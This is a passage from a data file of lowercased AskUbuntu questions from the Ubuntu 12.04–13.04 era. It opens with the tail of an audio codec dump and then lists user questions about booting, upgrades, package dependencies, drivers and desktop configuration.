index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x04 0x04 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a 0x1b* 0x1d 0x1e node 0x18 [ audio selector ] wcaps 0x30050d : stereo amp-out amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a* 0x1b 0x1d 0x1e node 0x19 [ pin complex ] wcaps 0x400581 : stereo control : name= '' headphone jack '' , index=0 , device=0 pincap 0x0000001c : out hp detect pin default 0x04214040 : [ jack ] hp out at ext right conn = 1/8 , color = green defassociation = 0x4 , sequence = 0x0 pin-ctls : 0xc0 : out hp unsolicited : tag=01 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1a [ pin complex ] wcaps 0x400481 : stereo control : name= '' internal mic phantom jack '' , index=0 , device=0 pincap 0x00001324 : in detect vref caps : hiz 50 80 pin default 0x90a70130 : [ fixed ] mic at int n/a conn = analog , color = unknown defassociation = 0x3 , sequence = 0x0 misc = no_presence pin-ctls : 0x24 : in vref_80 unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1b [ pin complex ] wcaps 0x400581 : stereo control : name= '' mic jack '' , index=0 , device=0 pincap 0x00011334 : in out eapd detect vref caps : hiz 50 80 eapd 0x0 : pin default 0x04a19020 : [ jack ] mic at ext right conn = 1/8 , color = pink defassociation = 0x2 , sequence = 0x0 pin-ctls : 0x24 : in vref_80 unsolicited : tag=02 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1c [ pin complex ] wcaps 0x400581 : stereo pincap 0x00000014 : out detect pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1d [ pin complex ] wcaps 0x400581 : stereo pincap 0x00010034 : in out eapd detect eapd 0x0 : pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1e [ pin complex ] wcaps 0x400481 : stereo pincap 0x00000024 : in detect pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1f [ pin complex ] wcaps 0x400501 : stereo control : name= '' speaker phantom jack '' , index=0 , device=0 pincap 0x00000010 : out pin default 0x92170110 : [ fixed ] speaker at int front conn = analog , color = unknown defassociation = 0x1 , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11* node 0x20 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x12 node 0x21 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x22 [ pin complex ] wcaps 0x400781 : stereo digital pincap 0x00000010 : out pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 1 0x21 node 0x23 [ pin complex ] wcaps 0x40040b : stereo amp-in amp-in caps : ofs=0x00 , nsteps=0x04 , stepsize=0x2f , mute=0 amp-in vals : [ 0x00 0x00 ] pincap 0x00000020 : in pin default 0x40f001f0 : [ n/a ] other at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x00 : power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x24 [ audio mixer ] wcaps 0x20050b : stereo amp-in amp-in caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11 node 0x25 [ vendor defined widget ] wcaps 0xf00000 : mono
292790	installing ubuntu 13.04 divided my hdd	i just tried installing ubuntu 13.04 and i 'm sure i followed the right steps until he loading screen after the restart required ... when it boot up it asked between win 7 disk1 or win 7 disk2 . and ubuntu 13.04 ubuntu works great but win 7 wont load and i only have one hard drive.so i think its partition . i need win 7 for my brother but i used ubuntu for being more efficient . what can i do to recover win 7 when the disk is divided into 2 section..why in ubuntu has a slider to choose memory but the minimum size is around 130gb for storage
292796	how to run a script at shutdown	i want to reset the hardware clock from the system clock at shutdown . i created this script ( k99savetime.sh ) : # ! /bin/sh # # # begin init info # provides : savetime.sh # default-start : 6 0 # short-description : set hwclock . # description : set hwclock to systemclock on halt or reboot . # # # end init info path=/sbin : /usr/sbin : /bin : /usr/bin log_action_msg `` updating hwclock with system clock '' hwclock -- systohc exit 0 i saved the script to /init.d , made it executable , and created a symbolic link in /etc/rc6.d the machine appears to shutdown correctly , that is , i do n't see any errors and it does n't hang up . how do i know that the script runs at shutdown ? is the script correctly written to do what i want ?
292797	usb hard drives being only read-only ?	i have finally gotten my hard drive to be formatted in fat32 but now , when ever i try to move a file onto it , it says : `` the destination is read-only . '' i have been looking through it in gparted and nothing seems to work . any ideas ? thanks to anybody that can help : )
292802	why i ca n't see my desktop icons in ubuntu 13.04 ?	i just installed ubuntu 13.04 in my laptop aspire-m3-5871tg , and i ca n't see anything ( neither icons , ... ) . only is visible the desktop background but i can open and work with the terminal . maybe the problem is related with nvidia geforce gt 640m vs unity . i 've tried several commands : dconf reset -f /org/compiz/ unity -- reset-icons & disown and unity -- replace & but nothing happens . i 've tried other commands as well : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current and nothing happens . i 've also tried to install tweak but is it not possible to find it . thus , i ca n't do nothing ... definetely my laptop is not compatible with ubuntu 13.04 ?
292803	make shotwell list events by year instead of by month	while re-discovering shotwell after upgrading to ubuntu 13.04 , i started organizing my photo album for real . i quickly noted that i prefer a quite wide classification of events , so that one event usually spans many days ( sometimes even weeks - a vacation trip , for example ) . shotwell handles this very nicely by displaying the first and last dates of photos in the event - but it still sorts the events by month in the side bar : since these events often span over month boundaries ( even if it 's just august 29 to september 3 ) i 'd rather just have all the events sorted by year . however , i ca n't find any settings related to this . is there a way to change this view ? note : i do n't care about folder structure on the file system here - that i have setup just as i want it . this is just the event browser inside shotwell .
292808	should i update the ubuntu release name for ppas ?	does it matter that i have files like webupd8team-jupiter-precise.list in my /etc/apt/sources.list.d folder if i 'm using raring ? should i update the sources inside to say raring instead of precise or quantal ? i 'm conflicted on what to do , because if i had added the repos today with add-apt-repository then the release names would have been up to date . but if updating them was fine , then that should have happened on the upgrade .
292810	compiz refresh rate keeps resetting itself to 50	compiz refresh rate keeps resetting itself to 50 every time you restart the pc this only happens with nvidia with nouveau driver everything looks good but gets very hot pc reaches 80
292815	upgraded to 13.04 , can not boot	i just got through an upgrade to 13.04 and my machine wo n't reboot . after getting through the boot loader screen , i just get a completely blank display . what can i do to boot with a console instead of having it try x11 ? all the answers i 've found seem to have been left behind by significant advances in the complexity of the boot parameter menu . my system is an hp laptop with a secure lvm partition . i 've been through about 5 or 6 release upgrades on this same machine , always without incident . edit — i 've gotten to a console boot , but regardless of what kernel i try the system hangs at the `` loading < linux version > '' line .
292818	dell inspiron n5110 syslog acpi warnings on ubuntu 13.04	i just installed ubuntu 13.04 and got a bunch of warnings in syslog : may 9 02:21:34 dell kernel : [ 9.689651 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689676 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 9 02:21:34 dell kernel : [ 9.689688 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689703 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \_sb_.pci0.peg0.pegp.gpio 2 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689717 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 9 02:21:34 dell kernel : [ 9.689724 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689738 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \_sb_.pci0.peg0.pegp.gpio 2 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689752 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 9 02:21:34 dell kernel : [ 9.689758 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689772 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \_sb_.pci0.peg0.pegp.gpio 2 ( 20121018/utaddress-251 ) may 9 02:21:34 dell kernel : [ 9.689785 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver and i would like to get rid of them , but have no clue on how ... what is acpi and how do i get to know what device is ment from these lines ? thia , morbus
292821	how do i make my 305 gb drive my default drive ?	i installed ubuntu 12.04 and i let it run from 10 gb . now i have run out of space by using 10 gb of data , but i have another 305 on my default hard drive . how do i make all that data go onto that disk so i can have more space ?
292826	icons for custom mime-type does not show up with ubuntu-mono-dark theme	i manually installed luxrender 1.2.1 under /usr/local/bin/ and it works fine and dandy . i then created 5 new mime-types for luxrender *.lxs , *.lxo , *.lxm , *.lxv and *.flm file formats ( scene , objects , materials , volumes and film ) . i created them with assogiate for convenience , however here is the simple generated override.html file : < ? xml version= '' 1.0 '' ? > < mime-info xmlns= '' http : //www.freedesktop.org/standards/shared-mime-info '' > < mime-type type= '' text/x-luxrender-scene '' > < glob pattern= '' *.lxs '' / > < comment > luxrender scene < /comment > < /mime-type > < mime-type type= '' text/x-luxrender-materials '' > < glob pattern= '' *.lxm '' / > < comment > luxrender materials < /comment > < /mime-type > < mime-type type= '' text/x-luxrender-objects '' > < glob pattern= '' *.lxo '' / > < comment > luxrender objects < /comment > < /mime-type > < mime-type type= '' text/x-luxrender-volumes '' > < glob pattern= '' *.lxv '' / > < comment > luxrender volumes < /comment > < /mime-type > < mime-type type= '' image/x-luxrender-film '' > < glob pattern= '' *.flm '' / > < comment > luxrender film < /comment > < /mime-type > < /mime-info > then , i ran update-mime-database ~/.local/share/mime , which updated the file mime.cache . the mime-types now works ( both tested with mimetype and in the nautilus properties panel of a file ) . now i want to associate the icons ( which come with luxrender as 256x256 png files ) . i resized them to the apropriate sizes and put them under /usr/share/icons/hicolor/ ? ? x ? ? /mimetypes . finally , i refreshed the cache with sudo gtk-update-icon-cache /usr/share/icons/hicolor . if i open assogiate , it displays the correct icons even if i have n't explicitly defined them . however , nautilus does not . since i 'm using ubuntu-mono-dark ( which however inherits from hicolor ) , i thought that it was because i had to put them under /usr/share/icons/ubuntu-mono-dark too , or maybe /usr/share/icons/humanity . however , this does n't work neither . the strange fact is that if i switch my theme to hicolor , the new icons actually shows up ! this seems to suggest that they are installed correctly ... does anyone have an idea about what is happening ? where do i have to put the icons ? what should i configure ? ps : just as a side note , i had the same problem with mathematica icons ...
292827	booting ubuntu on usb from bios	when i open boot in bios and select my usb pendrive the setup asks for a file path . what do i enter in the file path ?
292828	13.04 ; frequent freezes under gnome-shell , gnome , unity	i just upgraded 12.10 -- > 13.04 on my dell precision : intel ( r ) xeon ( r ) cpu e5-1620 0 @ 3.60ghz nvidia corporation gt218 [ nvs 300 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) i can login via gdm -- by default i use gnome-shell . within ( i 'd guess ) 30-45 seconds the system freezes . and it really is frozen ; e.g . if i 'm logged in by ssh from my laptop , i 'm frozen there as well . i get the same behavior when i choose in gdm to login using `` gnome ( fallback ) '' or unity . but if i ctl-alt f2 and login through the console , i have no freezing-difficulties at all . i 've looked through /var/log/syslog* , and i do not see a culprit . i was not having any difficulties with 12.10 . i was using xserver-xorg-video-nouveau , and i wondered at first if that was the culprit . so i tried installing the nvidia-current ( and the packages that dragged in ) . but this had no effect -- the freezing behaviour was the same ( i 've now changed back to nouveau - the console is nicer ... ) one more data point , which is probably a red herring . i did the upgrade two days ago , and had problems more-or-less immediately . i noticed that a certain hardware sensor was starting up ( psensor ) each time i logged in , and its launch seemed to coincide with the freezes i was having . so i logged in remotely and removed all the psensor packages . things seemed better - for a day i had no freezes at all , so i thought i had solved the problem . but it has now returned . i suspect that my question is going to be closed and i 'm going to be told to file a bug report , and i understand . but i still think there are some `` askubuntu '' questions here : for one thing : i do n't know the culprit -- what should i file a bug report against ? and : i 'm hoping for advice/suggestions . would it help to try to use an older kernel ? i have n't tried that yet ( mainly because i suspect it would cause a big mess of `` apt '' related dependency problems ) .
292829	i do n't see my ubuntu 's wallpaper	i ca n't see my wallpaper i updated nautillus and bam ! i change it alot of times and still ca n't see it , everything works correctly only this bothers me a little please help ( sorry about my englis i 'm a spanish speaker )
292833	planning on switching to ubuntu !	i 'm planning on taking my hp envy m6 amd a10 cpu , with a amd radeon hd 7660g discrete-class gpu , and i was wondering if there 's any packages i should install to make it run effectively when i first switch . ( drivers , etc . ) i hate windows 8 ; i just want ubuntu to work well and to still be able to play games on my laptop . when i switched my brother 's computer , i had a lot of additional packages and things to run before it was operational and i 'd prefer to not spend an entire day getting it up and running ... thank you for your time !
292840	term for `` modified ( by you or by a script ) since installation . '' dialogue ?	sometimes i see the following dialog . configuration file `/etc/ ... ' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : background this process to examine the situation the default action is to keep your current version . *** interfaces ( y/i/n/o/d/z ) [ default=n ] ? n my question is only about terminology . what is the term for this method to ask the user , the term for this dialogue ? once i have a technical term , it 's easier to find information about it .
292841	upgrade problem with 12.04	i want to upgrade from ubuntu 12.04 , but the update manager does n't show me that any upgrades are available . what do i do ?
292843	delete tomcat6 from services	i just uninstalled tomcat6 and installed tomcat7 , and now that i want to start , stop or restart the service , ubuntu shows the two of them , for example sudo service tomcat and then ubuntu shows two alternatives , for both tomcat6 and tomcat7 , but i do n't have and i do n't want tomcat6 to appear there , what should i do ?
292844	if i run boot repair will i lose everything in my hard drive ?	my computer wo n't boot to ubuntu . what i get instead is `` busybox v.1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in . commands . ( initramfs )
292856	how to improve the quality of music playing in ubuntu ?	i do n't know how to start debugging it , but when i play music using xbmc it sounds a lot better than when using clementine . i know it is a little subjective , but although i love xbmc great features , clementine has other qualities , like a better search . first my setup : my computer has a s/pdif coaxial output which i connect to my old pioneer receiver . the receiver connects to my pair of speakers . i 'm playing high quality mp3 files . in clementine - > preferences - > general - > playback i have configured : '' choose automatically '' for the output plugin of gstreamer audio engine . album replay gain is checked , pre-amp is 0.0db . apply compression to prevent clipping is checked . xbmc has more configuration options : audio ouput : optical/coax speaker configuration : 2.0 boost volume level on downmix : checked dolby digital ( ac3 ) capable receiver : checked dts capable receiver : unchecked audio ouput device : default passthrough output device : iec958 i 've changed xbmc configurations from the default . it was `` analog audio '' . the quality improved . ubuntu audio settings does n't give me many options . i 'm using ubuntu 12.10 , with default audio configuration . how can i improve clementine quality ? references explaining what are all these options are welcome .
292859	can i use a custom shortcut to echo a letter or string ?	what i want is when i type something like ctrl+shift+alt+a it echoes `` 5 '' ( just as an example ) . like i go to keyboard > shortcuts > custom shortcuts click the `` + '' and i type in the name of the shortcut and then i write the command . in terminal i can write ( just an example ) : echo á or i could write ( again just an example ) : cat desktop/letter.txt the `` echo '' command just echoes the letter . the `` cat '' command echoes the contents of the file . but it seems to only work if i write it in the terminal ( the command works . not the shortcut ) . how can i create a shortcut that echoes/prints a letter on where i want to write it so i do n't have to write unicode like u+16a1 or something but only have to press alt or ctrl and a letter ? i have 13.04
292862	integrity check against package repository ?	when there are security updates , i review and install them as soon as possible and think about using automatic updates . from time to time i want to boot from a clean boot cd and check if the system has been compromised . for that reason , i want to check if any packages / binaries have been modified , check the bootloader , check for rootkits . let 's suppose i booted from a clean boot cd and mounted the hdd filesystem . how can i get list of all sha256 hash sums of all installed binaries and configuration files and check them against the versions from debian repository ? i have looked into intrusion detection systems ( debsums , ) afick , aide , fcheck , integrit , osiris , ossec , samhain , tripwire , but they all have in common , that they want to create a known-good database before auditing . this does n't scale very well , because updates are pretty frequent , which render that known-good database less useful . re-creating the known-good database after updating is n't very safe either - let 's say apt-get had a bug and installed a malicious package , then the checksum of that malicious package would end up in the known-good database . i think the real solution is checking against the distribution 's package repository . how can i do that ? i 've checked http : //wiki.debian.org/secureapt # how_to_manually_check_for_package.27s_integrity already , but instructions are incomplete .
292864	i deleted my main partition , how do i recover it ?	i accidentally deleted my main partition , however i have n't restarted yet so i still have access to all my files . is there any way to prevent it being deleted on restart ?
292865	upgrade mysql server issue	i failed to upgrade mysql server . here 's what i tried : i first issue this command to update the package list : sudo apt-get update then , upgrade by : sudo apt-get upgrade it shows the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : mysql-server-5.5 : depends : mysql-server-core-5.5 ( = 5.5.28-0ubuntu0.12.04.2 ) but 5.5.31-0ubuntu0.12.04.1 is installed e : unmet dependencies . try using -f. apparently a newer version is installed ( but why ? i did n't install manually ) . okay , as it suggests , i issue the command to attempt fixing : sudo apt-get -f install here is the output : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mysql-server mysql-server-5.5 suggested packages : tinyca mailx the following packages will be upgraded : mysql-server mysql-server-5.5 2 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 2 not fully installed or removed . need to get 0 b/8889 kb of archives . after this operation , 64.5 kb of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_hk.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory dpkg : dependency problems prevent configuration of mysql-server-5.5 : mysql-server-5.5 depends on mysql-server-core-5.5 ( = 5.5.28-0ubuntu0.12.04.2 ) ; however : version of mysql-server-core-5.5 on system is 5.5.31-0ubuntu0.12.04.1 . dpkg : error processing mysql-server-5.5 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then i try to use another command that some people suggest in the internet : sudo apt-get -f upgrade same output is produced . apart from re-installing mysql server , what else can i do ? using ubuntu server 12.04 lts
292866	how to fake ubuntu version number to applications	i 'm trying to install intel c++ compiler on ubuntu 13.04 , but the installation script says that only ubuntu 12.10 and below are supported , and there is no option to force installation . so is there any way i can fake a version number to the installation script so it can install ? i 'm just experimenting , and not afraid to break the system .
292868	how do i enable pressure for my wacom intuos l ?	i saw a few answers that give a very long procedure to install some drivers but they are very old . the tablet works but there is no pressure sensitivity not in krita , mypaint or gimp .
292872	make an application require root permission	how do i force an application to always require root permission ? for example , if i run nautilus , it should tell me permission denied and have me run it as root . is there a way to do this in ubuntu ? force-require root permission ?
292878	how to set swap in /etc/initramfs-tools/conf.d/resume if i have two swap partitons ?	i have two swap partitions in fstab : /dev/sda8 none swap sw , pri=1 0 0 /dev/sdb8 none swap sw , pri=1 0 0 how to set swap in /etc/initramfs-tools/conf.d/resume file ? thanks https : //help.ubuntu.com/community/swapfaq is not for 12.04 . `` info : this will not work for 12.04 , resume from hibernate work differently in 12.04 . '' how to do in 12.04 ?
292879	how can i open sdm.pkg and .sdx files on ubuntu ?	i would like to download windows 8 disk images , but the files i have for the download are sdm.pkg and 100189659562.sdx . how can i open these files on my computer running ubuntu ?
292887	how to install ubuntu without a dvd ?	recently i downloaded ubuntu 13.04 ( iso ) . now after extracting the iso file and running wubi - it says downloading required files though i had already downloaded the iso file ( 794 mb ) . so what to do now ?
292894	could n't connect using wired connection	this is my first time using ubuntu . i am using verion 12.04 and i ca n't connect through wired connection . the network card i am using is atheros communications inc. ar8161 gigabit ethernet ( rev 08 ) the logical name of this network is eth2 . is there a wrong configuration in my system ? i am using a home router , which is dynamic connection ( the router has dhcp server running ) my ifconfig is : eth1 link encap : ethernet hwaddr c0:18:85 : d2 : c9 : a3 inet addr:192.168.1.110 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :c218:85ff : fed2 : c9a3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:17133 errors:17 dropped:0 overruns:0 frame:247488 tx packets:10304 errors:7 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:22986154 ( 22.9 mb ) tx bytes:1059388 ( 1.0 mb ) interrupt:17 eth2 link encap : ethernet hwaddr dc:0e : a1 : ef:4f:79 inet6 addr : fe80 : :de0e : a1ff : feef:4f79/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:201 errors:0 dropped:0 overruns:0 frame:0 tx packets:479 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:48578 ( 48.5 kb ) tx bytes:104673 ( 104.6 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:944 errors:0 dropped:0 overruns:0 frame:0 tx packets:944 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:126065 ( 126.0 kb ) tx bytes:126065 ( 126.0 kb ) i tried to disable my ipv6 also the problem is still not solved
292897	dhcpd : i have 2 linux ubuntu servers running dhcp . is it possible to install a 3rd dhcp server ( which will run windows server ) ?	im learning /etc/dhcpd.conf , and set up 2 dhcp servers that are running ubuntu 1204 . do you know if i can make a 3rd dhcp server , but i want this one to run windows dhcp ( not ad , just dhcp and download zone updates from the ubuntu dhcp servers ) ?
292899	role of dependencies while installing software ? ?	what is the role of dependencies while installing any software ? i was installing vlc player and it were closed by giving me error something like check dependency . what is to solution of this and how i 'll get these dependencies ? ? thanks in advance .
292903	in ubuntu 13.04 backspace button in nautilus not working ?	pc : acer aspire e1-571 os : ubuntu 13.04 amd64 i want to downgrade my nautilus file browser in ubuntu 13.04 and i have tried the soluos patch but not satisfied . i just want to install nautilus 3.4 . any help thanks in advace .
292908	sounds does n't work	sound does not work on my computer , neither did it on the other version of ubuntu . i suspect it is a problem of the sound card , although it worked when using windows . anything i can do ? download something ?
292910	i am unable update ubuntu 12.04	when i 'm trying to update through terminal i 'm getting the following error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i am not sure if it is due to virus or any other reason .
292912	keyboard shortcut for `` open a terminal here '' in nemo	how can i make a keyboard shortcut for `` open a terminal here '' in nemo ? i am finding the `` files '' manager formerly known as nautilus that comes with ubuntu 13.04 to be too crippled to bother using anymore , and i have switched to nemo file manager with good results so far . there 's just one thing i 'm missing , a customisable keyboard shortcut to open in terminal in the current location . the method that i use for nautilus does n't work any longer because i have no key for can-change-accels related to nemo , and neither do i see `` open in terminal '' in the file menu drop down . it is , however in the right click menu in nemo .
292915	“sorry , ubuntu 13.04 has experienced an internal error”	i am not sure what is causing this problem occurs every time at the start after booting . bug reported https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1178564
292918	no route to host before ping	i have a really strange problem with a netbook running lubuntu and no ipv6 configured , since i want to use only ipv4 . when i try to ping or connect to the netbook with any protocol with my laptop ( ubuntu 13.04 also with no ipv6 ) in any way , i get the error : ssh : connect to host xxx.xxx.xxx.xxx port 22 : no route to host i do n't have this problem while connecting from my laptop to any other computer . now the strange thing . if i ping my laptop from the netbook , everything gets ok and i can connect from there on without any problems . if i restart the laptop , the problem appears again . does anybody have an idea why this might be happening ?
292924	what does `` @ '' mean in bind zone file ?	usually after $ ttl and $ origin there is a line starting with @ and in in zone name then email address of admin , what does @ mean here and in the next entries ?
292925	how to sandbox applications ?	i want to run small untrusted programs , but restrict them from accessing any files outside of their folder , network access , and everything else that they do n't really need . what is the simplest way to achieve this ?
292926	unmet dependencies linux-server depend on linux-image-server	on my ubuntu server 12.04.2 , lvm partition , i have this problem when i run apt-get -f install : apt-get-f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer needed : linux-image-3.2.0-37-generic linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 61 not upgraded . 1 not fully installed or removed . it is necessary to o 1736 in the archives . after this operation , 1024 o of additional disk space will be used . do you want to continue [ y / n ] ? o reception : 1 http : //fr.archive.ubuntu.com/ubuntu/ precise-updates/main linux-server amd64 3.2.0.41.49 [ 1736 b ] 1736 o approved in 0s ( 57.2 kb / s ) dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.39.47 ) , however : the version of linux-image-server on the system is 3.2.0.41.49. linux-server depends on linux-headers-server ( = 3.2.0.39.47 ) , however : the version of linux-headers-server on the system is 3.2.0.41.49. dpkg : error processing linux-server ( - configure ) : dependency problems - leaving unconfigured no `` contribution '' report was created because the error message indicates an error running a previous failure . errors were encountered while processing : linux-server e : sub-process / usr / bin / dpkg returned an error code ( 1 ) i tried to download linux-server_3.2.0.39.47_amd64.deb and dpkg -i linux-server_3.2.0.39.47_amd64.deb but it says kernel already installed . any idea ? thank you .
292933	13.04 upgrade wo n't boot kernel 3.8	after upgrading from 12.10 to 13.04 , my toshiba nb305 wo n't boot under kernel 3.8.. i am able to boot if i manually select kernel 3.5. from the grub menu . i tried several things that have been suggested on the forums , including uninstalling jupiter and running boot-repair . neither of these worked . before i ran the boot-repair , attempting to boot kernel 3.8 would result in dropping to a shell . now it just hangs on a black screen after grub . here is the link that boot-repair returned to me for troubleshooting purposes : http : //paste.ubuntu.com/5646126/ i suppose i could set my grub preferences to load kernel 3.5 , but it would be nice to have 3.8 bootable . any ideas ? thanks !
292939	contribute to ubuntu touch	how can one contribute to ubuntu touch ? can we post apps for peer review ? it 'll be great if someone can chalk out a guide as regards how someone can contribute to this project .
292948	gnu toolchain required on ubuntu 13.04 - for offline pc	i am very new to this site . recently i have successfully installed ubuntu-13.04-32bit-desktop version on my dell laptop and ibm pc . earlier i was developing qt-5.0.2 based applications on windows 7 . now i switched to ubuntu . to my surprise : i did not find gnu tool chain in ubuntu 13.04 . and unfortunately , my systems are not connected to internet . how and from where can i download gnu tool chain as a package and transfer & install them on my laptop and pc ? this is really a huge requirement . please guide me . thanks in advance .
292955	mac os virtualbox appliance for ubuntu 12.04 for purchase ?	is there a mac os virtualbox appliance for ubuntu that one can purchase ? specifically , i have the 64 bit 12.04 version that would act as a host .
292958	trying to dual boot win 8 and ubuntu 12.10	i have been trying to install windows 8 and ubuntu 12.10 ( 64 bit ) on a lenovo twist notebook . i have now installed windows 8 ( with uefi , secure boot disabled ) and i am following the instructions in the post below . ubuntu 12.10 installer does n't recognise windows 8 partition on toshiba c850 laptop the problem is that ubuntu does n't recognise that windows is installed and if i ignore this , and proceed by selecting 'other ' and go on to partition the free space on the hard disk for ubuntu , i lose the windows boot when it 's completed . using boot repair does n't work either so i have to clear it all off using gparted and start over by installing windows 8 again . what do i have to do to get the windows install recognised and to install ubuntu ? thanks ,
